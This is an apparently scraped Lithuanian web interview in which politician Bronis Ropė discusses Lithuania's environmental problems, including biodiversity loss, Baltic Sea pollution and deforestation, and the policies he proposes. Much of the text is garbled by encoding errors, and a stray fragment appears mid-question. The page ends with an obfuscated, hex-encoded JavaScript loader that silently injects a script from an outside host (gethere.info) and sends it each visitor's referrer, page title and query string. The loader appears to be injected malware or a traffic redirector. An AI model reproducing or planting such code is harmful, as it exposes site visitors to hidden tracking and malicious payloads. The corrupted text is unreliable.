Apie aplinkosaugA� a�� Bronis RopA�

Aplinkosauga a�� natA�ralios ir A?mogaus paveiktos ar sukurtos aplinkos saugojimas nuo fizinio, cheminio, biologinio ir kitokio neigiamo poveikio ar pasekmiA?, atsirandanA?iA? A?gyvendinant planus ir programas, vykdant A�kinA� veiklA� ar naudojant gamtos iA?teklius.

Apie Lietuvos aplinkosaugos problemas, ateinanA?iA? metA? iA?A?A�kius ir jA? sprendimus atsakys Lietuvos valstieA?iA? ir A?aliA?jA? sA�jungos narys, antruoju numeriu kandidatuojantis A? Europos ParlamentA�,A�ilgametis Ignalinos meras, Bronis RopA�, A?iemet dalyvavA�s LR Prezidento rinkimuose.

Kokios, JA�sA? nuomone, yra pagrindinA�s A?iandienos aplinkosaugos problemos Lietuvoje?

Bio A?vairovA�s nykimas, Baltijos jA�ros uA?terA?tumas, miA?kA? kirtimas (per menkai rA�pinantis miA?kingumo didinimu), maA?i alternatyvios energetikos, blogi automobilizmo maA?inimo miestuose rezultatai, atliekA? tvarkymo problemos.

KokiA? priemoniA? joms sprA�sti, JA�sA? nuomone, reikA�tA? imtis?

IA? tikrA?jA? tai mums reikia pakeisti ekonominA� sistemA� ir orientuotis ne A? aklA� BVP ir pelno vaikymA�si, o A? tvarA? A?moniA? poreikiA? tenkinimA�, kuris bA�tA? socialiai ir ekologiA?kai atsakingas. Na, o A?iandien valstybiniu lygiu galima bA�tA? veikti A?iomis kryptimis:
– pertvarkyti valstybines, savivaldybiA? A?mones tvarios raidos principais ir atitinkamai orientuoti vieA?uosius pirkimus (daugiau „A?aliA?jA? pirkimA?“, skatinti smulkiuosius tvarius A�kius ir t. t.);
– plA�sti nedirbamA? A?emiA? miA?kingumA�, uA?sibrA�A?ti rimtus tikslus ir priemones jam realiai auginti;
– ne kosmetiniais/reklaminiais projektais, o ambicingai ir nuosekliai vystyti dviraA?iA?, traukiniA? ir kitA� vieA?A�jA? transportA�;
– plaA?iai ir lanksA?iai taikyti alternatyvios energetikos technologijas ir ieA?koti naujA?, esant galimybA�ms didinti vieA?ojo sektoriaus vaidmenA? A?ioje srityje.

Kokie didA?iausi iA?A?A�kiai laukia Lietuvos aplinkosaugos 2014 – 2015 metais?

Manytume, kad iA?vardytos Baltijos jA�ros, miA?kingumo problemos ir priemonA�s kovai su klimato kaita bA�tA? tinkami prioritetai.

Kaip vertinate Lietuvos gyventojA? skiriamA� dA�mesA? aplinkosaugai, ekologijai?

Gyventojai netruks pasekti tinkamu pavyzdA?iu, kai pajus realiA� valdA?ios A?staigA? ir A?moniA? atsakomybA�, patvirtinamA� darbais ir rezultatais. Jei vieA?asis sektorius pradA�s rA�A?iuoti ir pasirA�pins atitinkamomis galimybA�mis, suvaldys privatA? sektoriA?, kad bA�tA? minimizuotos produktA? pakuotA�s ir uA?kirstas kelias perprodukcijai, – tai bus geriausios tendencijos, kurios savaime ugdys ir visuomenA�.

GalbA�t galA�tumA�te paminA�ti keletA� paprastA? bA�dA? ar duoti patarimA?, kaip kiekvienas A?mogus galA�tA? prisidA�ti prie aplinkos saugojimo? articulo 72.

Vandens ir energijos taupymas, automobilio pakeitimas vieA?uoju transportu ar dviraA?iu, savo maisto auginimas ar apsirA�pinimas iA? smulkiA?/ekologiA?kA? A�kiA?, stengimasis gyventi paliekant po savA�s minimalA? kiekA? atliekA? – tai bA�dai, kuriuos galite rasti ir kitur, kartais priminti ir mums patiems. TaA?iau kadangi pokyA?iA? vardan gamtos reikia dideliA? ir reikA?mingA?, tai svarbiausia kiekvieno A?mogaus, kuris tA� jau suprato, pareiga – jungtis su bendraminA?iais, prisidA�ti prie ekologinio judA�jimo. Tik kartu A?monA�s gebA�s suvaldyti neatsakingo verslo savivalA�, stambius netvarius valdA?ios projektus, gamtos iA?tekliA? iA?A?vaistymo rizikas.

var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}